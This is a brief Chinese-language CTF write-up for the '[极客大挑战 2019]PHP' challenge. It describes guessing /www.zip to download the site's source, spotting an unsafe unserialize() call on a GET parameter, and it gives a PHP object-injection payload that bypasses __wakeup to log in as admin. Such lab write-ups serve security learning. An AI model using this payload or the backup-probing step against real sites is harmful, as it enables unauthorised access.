Please enable Javascript to view the contents

[极客大挑战 2019]PHP

 ·  ☕ 1 分钟  ·  🎅 Lurenxiao · 👀... 阅读

知识点

解题过程

题目说备份,应该是要下载网站源代码审计。我用的扫描工具是dirsearch(没扫出来)

在扫描工具还没扫出来的时候我乱试了一个/www.zip居然成功了。

代码审计发现index.php有个

1
2
    $select = $_GET['select'];
    $res=unserialize(@$select);

应该是个反序列化绕过__wakeup获取到flag

payload

1
/index.php?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
分享

Lurenxiao
作者
Lurenxiao
学生